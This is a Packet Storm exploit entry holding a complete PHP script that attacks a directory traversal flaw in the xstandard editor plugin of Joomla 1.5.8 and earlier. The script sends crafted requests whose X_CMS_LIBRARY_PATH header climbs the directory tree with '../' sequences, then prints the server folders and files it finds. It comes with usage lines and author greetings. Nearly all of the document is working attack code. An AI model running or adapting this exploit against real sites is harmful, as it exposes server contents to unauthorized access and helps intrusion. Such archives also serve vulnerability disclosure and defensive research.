Joomla 1.5.8 Directory Traversal Vulnerability

2009-01-07T00:00:00
ID PACKETSTORM:73642
Type packetstorm
Reporter irk4z
Modified 2009-01-07T00:00:00

Description

                                        
                                            `<?php  
/*  
Joomla <= 1.5.8 (xstandard editor) Local Directory Traversal Vulnerability  
  
discovered by: irk4z[at]yahoo.pl  
greets: all friends ;)   
*/  
  
echo "* Joomla <= 1.5.8 (xstandard editor) Local Directory Traversal Vuln\n";  
echo "* discovered by: irk4z[at]yahoo.pl\n";  
echo "*\n";  
echo "* greets: all friends ;) enjoy!\n";  
echo "*------------------------------------------------------------------*\n";  
  
$host = $argv[1];  
$path = $argv[2];  
$folder = $argv[3];  
  
if (empty($host) || empty($path)) {  
echo "usage: php {$argv[0]} <host> <path> [<folder>]\n";  
echo " php {$argv[0]} example.org /joomla\n";  
echo " php {$argv[0]} example.org /joomla ../../\n";  
exit;  
}  
  
echo "http://" . $host . $path . "/images/stories/\n\n";  
  
if ( empty($folder) ){  
$lev = "./";  
for( $i = 0; $i <= 7; $i++ ) {  
echo browseFolder($host, $path, $lev);  
$lev .= "../";  
}  
} else {  
echo browseFolder($host, $path, $folder);  
}  
  
function browseFolder($host, $path, $folder){  
  
$packet = "GET {$path}/plugins/editors/xstandard/attachmentlibrary.php HTTP/1.1\r\n";  
$packet .= "Host: {$host}\r\n";  
$packet .= "X_CMS_LIBRARY_PATH: {$folder}\r\n";  
$packet .= "Connection: Close\r\n\r\n";  
  
$o = @fsockopen($host, 80);  
if(!$o){  
echo "\n[x] No response...\n";  
die;  
}  
  
fputs($o, $packet);  
while (!feof($o)) $data .= fread($o, 1024);  
fclose($o);  
  
$_404 = strstr( $data, "HTTP/1.1 404 Not Found" );  
if ( !empty($_404) ){  
echo "\n[x] 404 Not Found... Maybe wrong path? \n";  
die;  
}  
  
//folders  
preg_match_all("/<baseURL>([^<]+)<\/baseURL>/", $data, $matches);  
//files  
preg_match_all("/<value>([^<]+\.[^<]{3,4})<\/value>/", $data, $matches2);  
  
$matches = array_merge( $matches[1], $matches2[1] );  
  
if ( empty($matches) ){  
$ret = "$folder [x] Failed...\n";  
} else {  
$ret = '';  
foreach( $matches as $tmp){  
$ret .= str_replace("images/stories/", '', str_replace("/./", "/", str_replace("//", "/", urldecode($tmp) ) ) ) . "\n";  
}  
}  
  
return ($ret);  
}  
  
?>  
`